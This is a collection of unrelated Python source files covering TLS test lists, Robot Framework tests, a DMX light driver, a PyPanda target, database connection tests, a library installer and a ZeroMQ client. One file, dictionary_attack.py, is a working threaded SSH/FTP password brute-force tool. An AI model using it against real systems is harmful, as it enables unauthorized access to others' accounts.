badtls(False, "rc4-md5.badtls.io", 11009, "denies use of RC4 with MD5 ciphers")
)
local_tests = testgroup(
local(True, "localhost", "valid localhost certificate"),
local(False, "nothing", "invalid localhost certificate"),
badssl_onlymyca("use only the given CA bundle, not system's")
)
all_tests = testgroup(
ssllabs_tests,
badssl_tests,
badtls_tests,
local_tests
)
|
test_run_and_rebot.py | import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from io import StringIO
from os.path import abspath, curdir, dirname, exists, join
from os import chdir, getenv
from robot import run, run_cli, rebot, rebot_cli
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils.asserts import assert_equal, assert_raises, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = getenv('TEMPDIR', tempfile.gettempdir())
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
options = {'output': 'NONE', 'log': 'NoNe', 'report': None}
options.update(kwargs)
return run(*args, **options)
def assert_signal_handler_equal(signum, expected):
sig = signal.getsignal(signum)
assert_equal(sig, expected)
class StreamWithOnlyWriteAndFlush:
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data), 1)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, include='?a??', skip='pass',
skiponfailure='fail'), 0)
self._assert_outputs([('2 tests, 0 passed, 0 failed, 2 skipped', 1)])
def test_multi_options_as_tuples(self):
assert_equal(run_without_outputs(self.data, exclude=('fail',), skip=('pass',),
skiponfailure=('xxx', 'yyy')), 0)
self._assert_outputs([('FAIL', 0)])
self._assert_outputs([('1 test, 0 passed, 0 failed, 1 skipped', 1)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
def test_run_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, run_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_run_cli_optionally_returns_rc(self):
rc = run_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP), 1)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
def test_rebot_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, rebot_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_rebot_cli_optionally_returns_rc(self):
rc = rebot_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, rc=None, **config):
self._clear_outputs()
returned_rc = run_without_outputs(data, outputdir=TEMP, **config)
if rc is not None:
assert_equal(returned_rc, rc)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
self._run(data, test=['NormalText'], variable=['NormalText:Hello'], rc=0)
self._run(data, test=['NormalText'], rc=1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
self._run(self.data, listener=listener+':1', rc=0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._run(self.data, rc=0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
def test_rerunfailed_is_not_persistent(self):
# https://github.com/robotframework/robotframework/issues/2437
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
self._run(data, output=OUTPUT_PATH, rc=1)
self._run(data, rerunfailed=OUTPUT_PATH, rc=1)
self._run(self.data, output=OUTPUT_PATH, rc=0)
assert_equal(rebot(OUTPUT_PATH, log=LOG_PATH, report=None), 0)
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_signal_handler_equal(signal.SIGINT, orig_sigint)
assert_signal_handler_equal(signal.SIGTERM, my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_when_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
dictionary_attack.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import paramiko # external package
import ftplib
import threading
import queue
import socket
from ftplib import FTP
from common_utils import menu_utils
from common_utils import file_utils
import config_params
from os import listdir
from os.path import isfile, join
import time
""" This module uses dictionaries to perform brute force attacks """
def load_dictionaries_list():
"""loading the list of credentials dictionaries"""
dictionaries_list = [f for f in listdir(config_params.CREDENTIALS_DICTIONARIES_FOLDER)
if (isfile(join(config_params.CREDENTIALS_DICTIONARIES_FOLDER, f)) and f.lower().endswith('.dic'))]
return dictionaries_list
def _ftp_connection_attempt(ip, port, user, passw, my_queue):
try:
ftp = FTP(ip, timeout=config_params.FTP_SERVER_TIMEOUT)
ftp.login(user, passw)
my_queue.put(passw)
except ftplib.error_perm:
return
except OSError as e:
menu_utils.error(e)
def _ssh_connection_attempt(ip, port, user, passw, my_queue):
conn_ssh = paramiko.SSHClient()
conn_ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
conn_ssh.connect(ip, port, user, passw)
my_queue.put(passw)
except paramiko.AuthenticationException:
return
except (socket.error, socket.timeout, paramiko.ssh_exception.SSHException) as e:
menu_utils.error(e)
def dictionary_attack(protocol, ip, port, interval, user, dictionary):
    if protocol.lower() not in ('ftp', 'ssh'):
menu_utils.warning('Only "FTP" or "SSH" protocols are supported')
return
menu_utils.header('Brute force attack, target IP: %s ' % ip)
menu_utils.mixed_info("Protocol:", protocol)
menu_utils.mixed_info("Interval between attempts:", "%s milliseconds" % interval)
menu_utils.mixed_info("User:", user)
menu_utils.mixed_info("Dictionary:", dictionary)
counter = 0
thread_list = []
passwords = file_utils.load_file_as_list(dictionary)
print("%s passwords in the dictionary" % len(passwords))
menu_utils.highlighted_info("Progress:\n")
my_queue = queue.Queue()
if passwords:
for passw in passwords:
time.sleep(interval/1000)
counter += 1
additional_info = "Trying pass: %s" % passw
menu_utils.progress_bar(int(100*counter/len(passwords)),
config_params.DISPLAY["progress_bar_width"], additional_info)
if protocol.lower() == 'ftp':
t = threading.Thread(target=_ftp_connection_attempt, args=(ip, port, user, passw, my_queue, ))
elif protocol.lower() == 'ssh':
t = threading.Thread(target=_ssh_connection_attempt, args=(ip, port, user, passw, my_queue,))
t.start()
thread_list.append(t)
if counter % config_params.MAX_NUMBER_THREADS == 0:
for thread in thread_list:
                    thread.join()  # wait for this batch of threads to finish
thread_list = []
                if not my_queue.empty():  # a found password was put on the queue
                    break
for thread in thread_list:
            thread.join()  # wait for the remaining threads to finish
        if not my_queue.empty():  # a found password was put on the queue
menu_utils.super_highlighted_info("\n[+] Password found: %s" % my_queue.get())
else:
menu_utils.warning("\n[-] Password not found in %s " % dictionary)
else:
menu_utils.warning("\n[-] %s dictionary not found " % dictionary)
|
spider_3x3.py | """The 3x3 spider light on the cieling
https://www.amazon.com/gp/product/B07XRDB4QT/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1
"""
import logging
import multiprocessing as mp
import time
import numpy as np # type: ignore
import music_visualization_system as mvs
import pymvf
LOGGER = logging.getLogger(__name__)
class Spider3X3:
def __init__(self, delay: float):
self._dmx_device = mvs.dmx.ESPDMX("espdmx1.caverage.lan", 80)
self._delay = delay
self.disable()
self._process_queue = mp.Queue()
self._drive_queue = mp.Queue()
self._process_process = pymvf.Process(target=self._process)
self._process_process.start()
self._drive_process = pymvf.Process(target=self._drive)
self._drive_process.start()
def enable(self) -> None:
dmx_channels = bytearray()
for _ in range(1, 9 + 1):
dmx_channels.append(0)
dmx_channels.append(220) # AUTO effect
for _ in range(11, 12 + 1):
dmx_channels.append(0)
try:
self._dmx_device(dmx_channels)
LOGGER.info("enabled")
except OSError:
LOGGER.critical("cannot reach Spider3X3 DMX controller")
def disable(self) -> None:
dmx_channels = bytearray()
        for _ in range(1, 12 + 1):  # zero all 12 channels, mirroring enable()
dmx_channels.append(0)
try:
self._dmx_device(dmx_channels)
LOGGER.info("disabled")
except OSError:
LOGGER.critical("cannot reach Spider3X3 DMX controller")
def _process(self) -> None:
""" Process incoming data into directions for the `_drive` process"""
buffers_of_delay = mvs.BUFFERS_PER_SECOND * self._delay
look_ahead_list = []
disable_time = None
while True:
look_ahead_list.append(self._process_queue.get())
# wait until we have enough values for the calculations
# nothing is discarded here, so no issues with timing or sync
            if len(look_ahead_list) <= buffers_of_delay / 2:
continue
timestamp, _ = look_ahead_list.pop(0)
# every intensity for DELAY seconds worth of buffers, approx
delayed_intensities = np.array(look_ahead_list)[:, 1]
if disable_time is None:
disable_time = timestamp
if np.average(delayed_intensities) > 0.3:
period = len(delayed_intensities) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
# LOGGER.info(">0.3")
disable_time = timestamp + period
elif (
np.average(delayed_intensities[: int(len(delayed_intensities) / 2)])
> 0.4
):
period = (len(delayed_intensities) / 2) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
LOGGER.info(">0.4")
disable_time = timestamp + period
elif (
np.average(delayed_intensities[: int(len(delayed_intensities) / 4)])
> 0.6
):
period = (len(delayed_intensities) / 4) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
LOGGER.info(">0.6")
disable_time = timestamp + period
enabled = bool(timestamp < disable_time)
# LOGGER.info(disable_time - timestamp)
# LOGGER.info(enabled)
self._drive_queue.put((timestamp, enabled))
def _drive(self) -> None:
""" Drive the DMX device"""
next_frame_time = None
current_status = False
while True:
timestamp, enabled = self._drive_queue.get()
if next_frame_time is None:
next_frame_time = timestamp + self._delay
# if current_status == enabled:
# # leave it be if it's the same
# next_frame_time += mvs.TIME_PER_BUFFER
# continue
while time.perf_counter() < next_frame_time:
# wait for next frame time
pass
if enabled:
self.enable()
else:
self.disable()
current_status = enabled
next_frame_time += mvs.TIME_PER_BUFFER
def __call__(self, timestamp: float, mono_intensity: float) -> None:
""" Add an intensity to the queue for processing.
Args:
timestamp: the timestamp of the buffer that the intensity came from.
mono_intensity: the intensity of the mono channel for the given timestamp.
"""
assert mono_intensity <= 1
self._process_queue.put((timestamp, mono_intensity))
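# Usage sketch (the 0.5 s delay and the intensity are illustrative values):
# instantiate the light and feed it one buffer's intensity.
if __name__ == '__main__':
    spider = Spider3X3(delay=0.5)
    spider(time.perf_counter(), 0.8)  # (timestamp, mono intensity in [0, 1])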
|
pypanda_target.py | from threading import Thread
from time import sleep
from os.path import abspath
from avatar2.targets import PandaTarget
from ..watchmen import watch
from .target import action_valid_decorator_factory, TargetStates
class PyPandaTarget(PandaTarget):
'''
The pypanda target is a PANDA target, but uses pypanda to run the framework.
'''
def __init__(self, *args, **kwargs):
try:
import pandare
except ImportError:
raise RuntimeError(("PyPanda could not be found! for installation, "
"please follow the steps at https://github.com/"
"panda-re/panda/blob/master/panda/pypanda/docs/USAGE.md"))
kwargs['executable'] = abspath(pandare.__file__)
super(PyPandaTarget, self).__init__(*args, **kwargs)
self.cb_ctx = 0
self.pypanda = None
self._thread = None
def shutdown(self):
if self._thread is not None and self._thread.is_alive():
self.protocols.execution.remote_disconnect()
self.pypanda.end_analysis()
# Wait for shutdown
while self._thread.is_alive():
sleep(.01)
super(PyPandaTarget, self).shutdown()
@watch('TargetInit')
def init(self, **kwargs):
from pandare import Panda
arch = self.avatar.arch.qemu_name
args = self.assemble_cmd_line()[1:]
self.avatar.save_config(file_name=self.qemu_config_file,
config=self.generate_qemu_config())
self.pypanda = Panda(arch=arch, extra_args=args, **kwargs)
# adjust panda's signal handler to avatar2-standard
def SigHandler(SIG,a,b):
if self.state == TargetStates.RUNNING:
self.stop()
self.wait()
self.avatar.sigint_handler()
self.pypanda._setup_internal_signal_handler(signal_handler=SigHandler)
self._thread = Thread(target=self.pypanda.run, daemon=True)
self._thread.start()
self._connect_protocols()
def register_callback(self, callback, function, name=None, enabled=True,
procname=None):
pp = self.pypanda
        if not hasattr(pp.callback, callback):
raise Exception("Callback %s not found!" % callback)
cb = getattr(pp.callback, callback)
        if name is None:
name = 'avatar_cb_%d' % self.cb_ctx
self.cb_ctx += 1
pp.register_callback(cb, cb(function), name, enabled=enabled,
procname=procname)
return name
def disable_callback(self, name):
pp = self.pypanda
pp.disable_callback(name)
def enable_callback(self, name):
pp = self.pypanda
pp.enable_callback(name)
def add_hook(self, address, function, enabled=True,
kernel=True, asid=None, cb_type="before_block_exec"):
        '''
        This function registers a hook at the specified address with pypanda
        :param address: Address to be hooked.
        :param function: Function to be executed at the specified address.
                         If the cb_type is "before_block_exec" (the default),
                         the arguments passed to that function are cdata
                         pointers to the following structs:
                         cpustate *, TranslationBlock *, hook *
        '''
self.pypanda.hook(address, enabled=enabled, kernel=kernel, asid=asid,
cb_type=cb_type)(function)
@watch('TargetReadMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def read_memory(self, address, size, num_words=1, raw=False):
        if not raw:
return self.protocols.memory.read_memory(address, size, num_words)
else:
return self.pypanda.physical_memory_read(address,size*num_words)
@watch('TargetWriteMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def write_memory(self, address, size, value, num_words=1, raw=False):
        if not raw:
return self.protocols.memory.write_memory(address, size, value, num_words=num_words)
else:
return self.pypanda.physical_memory_write(address, value)
def delete_callback(self, name):
return self.pypanda.delete_callback(name)
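# Usage sketch (assumes avatar2 and a PANDA build are installed; architecture,
# address and callback are illustrative assumptions):
if __name__ == '__main__':
    from avatar2 import Avatar, ARM
    avatar = Avatar(arch=ARM)
    target = avatar.add_target(PyPandaTarget)
    target.init()
    target.add_hook(0x8000, lambda cpu, tb, hook: None)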
|
test_connection.py | import time
import multiprocessing as mp
from threading import Thread
from unittest.mock import patch
import pytest
import rethinkdb as r
def test_get_connection_returns_the_correct_instance():
from bigchaindb.backend import connect
from bigchaindb.backend.connection import Connection
from bigchaindb.backend.rethinkdb.connection import RethinkDBConnection
config = {
'backend': 'rethinkdb',
'host': 'localhost',
'port': 28015,
'name': 'test'
}
conn = connect(**config)
assert isinstance(conn, Connection)
assert isinstance(conn, RethinkDBConnection)
def test_run_a_simple_query():
from bigchaindb.backend import connect
conn = connect()
query = r.expr('1')
assert conn.run(query) == '1'
def test_raise_exception_when_max_tries():
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import OperationError
class MockQuery:
def run(self, conn):
raise r.ReqlDriverError('mock')
conn = connect()
with pytest.raises(OperationError):
conn.run(MockQuery())
def test_reconnect_when_connection_lost(db_host, db_port):
from bigchaindb.backend import connect
original_connect = r.connect
with patch('rethinkdb.connect') as mock_connect:
mock_connect.side_effect = [
r.ReqlDriverError('mock'),
original_connect(host=db_host, port=db_port)
]
conn = connect()
query = r.expr('1')
assert conn.run(query) == '1'
def test_reconnect_when_connection_lost_tries_n_times():
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import ConnectionError
with patch('rethinkdb.connect') as mock_connect:
mock_connect.side_effect = [
r.ReqlDriverError('mock'),
r.ReqlDriverError('mock'),
r.ReqlDriverError('mock')
]
conn = connect(max_tries=3)
query = r.expr('1')
with pytest.raises(ConnectionError):
assert conn.run(query) == '1'
def test_changefeed_reconnects_when_connection_lost(monkeypatch):
from bigchaindb.backend.changefeed import ChangeFeed
from bigchaindb.backend.rethinkdb.changefeed import RethinkDBChangeFeed
class MockConnection:
tries = 0
def run(self, *args, **kwargs):
return self
def __iter__(self):
return self
def __next__(self):
self.tries += 1
if self.tries == 1:
raise r.ReqlDriverError('mock')
elif self.tries == 2:
return {'new_val': {'fact':
'A group of cats is called a clowder.'},
'old_val': None}
if self.tries == 3:
raise r.ReqlDriverError('mock')
elif self.tries == 4:
return {'new_val': {'fact': 'Cats sleep 70% of their lives.'},
'old_val': None}
else:
time.sleep(10)
changefeed = RethinkDBChangeFeed('cat_facts', ChangeFeed.INSERT,
connection=MockConnection())
changefeed.outqueue = mp.Queue()
t_changefeed = Thread(target=changefeed.run_forever, daemon=True)
t_changefeed.start()
time.sleep(1)
# try 1: MockConnection raises an error that will stop the
# ChangeFeed instance from iterating for 1 second.
# try 2: MockConnection releases a new record. The new record
# will be put in the outqueue of the ChangeFeed instance.
fact = changefeed.outqueue.get()['fact']
assert fact == 'A group of cats is called a clowder.'
# try 3: MockConnection raises an error that will stop the
# ChangeFeed instance from iterating for 1 second.
assert t_changefeed.is_alive() is True
time.sleep(2)
# try 4: MockConnection releases a new record. The new record
# will be put in the outqueue of the ChangeFeed instance.
fact = changefeed.outqueue.get()['fact']
assert fact == 'Cats sleep 70% of their lives.'
@patch('rethinkdb.connect')
def test_connection_happens_one_time_if_successful(mock_connect):
import bigchaindb
from bigchaindb.backend import connect
timeout = bigchaindb.config['database']['connection_timeout']
query = r.expr('1')
conn = connect('rethinkdb', 'localhost', 1337, 'whatev')
conn.run(query)
mock_connect.assert_called_once_with(host='localhost',
port=1337,
db='whatev',
timeout=timeout)
@patch('rethinkdb.connect', side_effect=r.ReqlTimeoutError())
def test_connection_timeout(mock_connect):
from bigchaindb.backend import connect
from bigchaindb.backend.exceptions import ConnectionError
query = r.expr('1')
conn = connect()
# connection should raise a ConnectionError after 3 tries
with pytest.raises(ConnectionError):
conn.run(query)
assert mock_connect.call_count == 3
|
dataengine-service_install_libs.py | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import os
import sys
import logging
import traceback
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from fabric.api import *
import multiprocessing
def install_libs(instance, data_engine):
data_engine['instance_ip'] = meta_lib.GCPMeta().get_private_ip_address(instance)
params = '--os_user {} --instance_ip {} --keyfile "{}" --libs "{}"'\
.format(data_engine['os_user'], data_engine['instance_ip'],
data_engine['keyfile'], data_engine['libs'])
try:
# Run script to install additional libs
local("~/scripts/{}.py {}".format('install_additional_libs', params))
except:
traceback.print_exc()
raise Exception
if __name__ == "__main__":
instance_class = 'notebook'
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
logging.info('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
print('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
data_engine = dict()
try:
data_engine['os_user'] = os.environ['conf_os_user']
data_engine['cluster_name'] = os.environ['computational_id']
data_engine['gcp_project_id'] = os.environ['gcp_project_id']
data_engine['gcp_region'] = os.environ['gcp_region']
data_engine['gcp_zone'] = os.environ['gcp_zone']
res = meta_lib.GCPMeta().get_list_instances(data_engine['gcp_zone'], data_engine['cluster_name'])
data_engine['cluster_instances'] = [i.get('name') for i in res['items']]
data_engine['keyfile'] = '{}{}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
data_engine['libs'] = os.environ['libs']
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to get parameter.", str(err))
sys.exit(1)
try:
jobs = []
for instance in data_engine['cluster_instances']:
p = multiprocessing.Process(target=install_libs, args=(instance, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to install additional libraries.", str(err))
sys.exit(1)
|
client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Hello World client in Python
# Connects REQ socket to tcp://localhost:5555
# Sends "Hello" to server, expects "World" back
#
import zmq
import threading
import queue
from zmqcs.common.message import MessageBase, CommandMSG, AsyncMSG
from zmqcs.common.defaults import Defaults
from zmqcs.client.callbacks import AsyncCallback
from zmqcs.client.stats import AsyncStats
from zmqcs.logs import get_logger
log = get_logger('zmqClient')
class zmqClient(object):
def __init__(self, en_async=True, async_timeout=Defaults.sub_timeout, req_timeout=Defaults.req_timeout):
self.connected = False
self._ctx = None
self._req_socket = None
self._sub_socket = None
self._async_enabled = en_async
self._exit = False
self._async_th = None
        # the SUB socket must only be used from its own thread once started, so subscriptions go through a queue
self._async_queue = queue.Queue()
self._as = AsyncStats()
self._async_timeout = async_timeout
self._req_timeout = req_timeout
self._callbacks = {}
self._last_req_endpoint = None
self._last_sub_endpoint = None
def connect(self, ip='localhost',
req_port=Defaults.repreq_port,
async_port=Defaults.pubsub_port):
self._last_req_endpoint = f"tcp://{ip}:{req_port}"
self._ctx = zmq.Context()
# Socket to talk to server
self._create_or_reset_req_socket()
log.debug(f"Connected REQ socket to endpoint: {self._last_req_endpoint}")
if self._async_enabled:
self._last_sub_endpoint = f"tcp://{ip}:{async_port}"
self._sub_socket = self._ctx.socket(zmq.SUB)
self._sub_socket.connect(self._last_sub_endpoint)
self._sub_socket.setsockopt(zmq.RCVTIMEO, self._async_timeout)
log.debug(f"Connected SUB socket to endpoint {self._last_sub_endpoint}")
log.info('Initialized sockets')
self.connected = True
def _create_or_reset_req_socket(self):
